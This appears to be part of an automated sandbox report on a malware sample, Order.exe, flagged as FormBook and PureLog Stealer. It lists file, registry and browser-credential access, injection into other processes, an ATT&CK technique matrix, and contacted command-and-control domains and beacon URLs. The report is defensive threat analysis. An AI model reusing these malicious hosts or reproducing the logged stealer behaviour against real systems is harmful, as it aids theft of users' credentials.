                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\Order.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.Order.exe.5130000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a6a628.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.5130000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a55808.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a6a628.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a55808.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.Order.exe.5130000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a6a628.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.5130000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a55808.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a6a628.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order.exe.3a55808.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		412
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		131
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Abuse Elevation Control Mechanism                  		11
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		41
                  Virtualization/Sandbox Evasion                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Data from Local System                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture4
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information                  		LSA Secrets2
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Abuse Elevation Control Mechanism                  		Cached Domain Credentials113
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                  Obfuscated Files or Information                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                  Software Packing                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Timestomp                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  DLL Side-Loading                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540817 Sample: Order.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 47 www.vasehub.xyz 2->47 49 www.moritynomxd.xyz 2->49 51 23 other IPs or domains 2->51 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 9 other signatures 2->63 10 Order.exe 4 2->10         started        signatures3 61 Performs DNS queries to domains with low reputation 49->61 process4 file5 39 C:\Users\user\AppData\Local\...\Order.exe.log, ASCII 10->39 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 Order.exe 10->14         started        17 powershell.exe 23 10->17         started        19 conhost.exe 10->19         started        21 Order.exe 10->21         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 23 mkvfHfXifKJWp.exe 14->23 injected 73 Loading BitLocker PowerShell Module 17->73 26 WmiPrvSE.exe 17->26         started        28 conhost.exe 17->28         started        process9 signatures10 65 Found direct / indirect Syscall (likely to bypass EDR) 23->65 30 mshta.exe 13 23->30         started        process11 signatures12 75 Tries to steal Mail credentials (via file / registry access) 30->75 77 Tries to harvest and steal browser information (history, passwords, etc) 30->77 79 Modifies the context of a thread in another process (thread injection) 30->79 81 3 other signatures 30->81 33 mkvfHfXifKJWp.exe 30->33 injected 37 firefox.exe 30->37         started        process13 dnsIp14 41 www.coffee-and-blends.info 217.160.0.231, 50024, 50025, 50026 ONEANDONE-ASBrauerstrasse48DE Germany 33->41 43 www.vasehub.xyz 162.213.249.216, 49956, 49967, 49978 NAMECHEAP-NETUS United States 33->43 45 8 other IPs or domains 33->45 53 Found direct / indirect Syscall (likely to bypass EDR) 33->53 signatures15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Order.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  Order.exe49%VirustotalBrowse
                  Order.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  www.vasehub.xyz1%VirustotalBrowse
                  softillery.info4%VirustotalBrowse
                  tukaari.shop0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.vasehub.xyz
                  		162.213.249.216
                  		truetrueunknown
                  softillery.info
                  		3.33.130.190
                  		truetrueunknown
                  tukaari.shop
                  		3.33.130.190
                  		truetrueunknown
                  www.moritynomxd.xyz
                  		172.81.61.224
                  		truetrue
                    		unknown
                    40wxd.top
                    		206.119.82.134
                    		truetrue
                      		unknown
                      www.specialgift.asia.s.strikinglydns.com
                      		35.156.117.131
                      		truetrue
                        		unknown
                        www.luxe.guru
                        		52.20.84.62
                        		truetrue
                          		unknown
                          dns.ladipage.com
                          		54.179.173.60
                          		truetrue
                            		unknown
                            digitalbloom.info
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.coffee-and-blends.info
                              		217.160.0.231
                              		truetrue
                                		unknown
                                filelabel.info
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  www.nad5.shop
                                  		156.226.22.233
                                  		truetrue
                                    		unknown
                                    ghs.googlehosted.com
                                    		142.250.186.83
                                    		truefalse
                                      		unknown
                                      multileveltravel.world
                                      		3.33.130.190
                                      		truetrue
                                        		unknown
                                        www.tukaari.shop
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.tmstore.click
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.40wxd.top
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.gemtastic.shop
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.softillery.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.longfilsalphonse.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.multileveltravel.world
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.digitalbloom.info
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.filelabel.info
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.specialgift.asia
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.amitayush.digital
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.coffee-and-blends.info/jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY=true
                                                                		unknown
                                                                http://www.filelabel.info/lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5true
                                                                  		unknown
                                                                  http://www.multileveltravel.world/ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5true
                                                                    		unknown
                                                                    http://www.nad5.shop/moqb/true
                                                                      		unknown
                                                                      http://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5false
                                                                        		unknown
                                                                        http://www.softillery.info/xia9/true
                                                                          		unknown
                                                                          http://www.digitalbloom.info/frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5true
                                                                            		unknown
                                                                            http://www.specialgift.asia/s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5true
                                                                              		unknown
                                                                              http://www.tukaari.shop/h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5true
                                                                                		unknown
                                                                                http://www.tmstore.click/qmcg/true
                                                                                  		unknown
                                                                                  http://www.amitayush.digital/5ab9/false
                                                                                    		unknown
                                                                                    http://www.vasehub.xyz/rhgo/true
                                                                                      		unknown
                                                                                      http://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5true
                                                                                        		unknown
                                                                                        http://www.moritynomxd.xyz/d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo=true
                                                                                          		unknown
                                                                                          http://www.vasehub.xyz/rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5true
                                                                                            		unknown
                                                                                            http://www.digitalbloom.info/frw6/true
                                                                                              		unknown
                                                                                              http://www.luxe.guru/esft/true
                                                                                                		unknown
                                                                                                http://www.softillery.info/xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5true
                                                                                                  		unknown
                                                                                                  http://www.40wxd.top/xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5true
                                                                                                    		unknown
                                                                                                    http://www.moritynomxd.xyz/d5je/true
                                                                                                      		unknown
                                                                                                      http://www.tukaari.shop/h8b0/true
                                                                                                        		unknown
                                                                                                        http://www.multileveltravel.world/ou1g/true
                                                                                                          		unknown
                                                                                                          http://www.filelabel.info/lclg/true
                                                                                                            		unknown
                                                                                                            http://www.nad5.shop/moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q=true
                                                                                                              		unknown
                                                                                                              http://www.coffee-and-blends.info/jp2s/true
                                                                                                                		unknown
                                                                                                                http://www.40wxd.top/xqel/true
                                                                                                                  		unknown

                                                                                                                  URLs from Memory and Binaries

                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://duckduckgo.com/chrome_newtabmshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designersGOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://duckduckgo.com/ac/?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers/?Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.founder.com.cn/cn/bTheOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers?Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://tempuri.org/DataSet1.xsdOrder.exefalse
                                                                                                                    		unknown
                                                                                                                    http://www.luxe.guru/mshta.exe, 00000009.00000002.4144994745.000000000546A000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003B5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.tiro.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
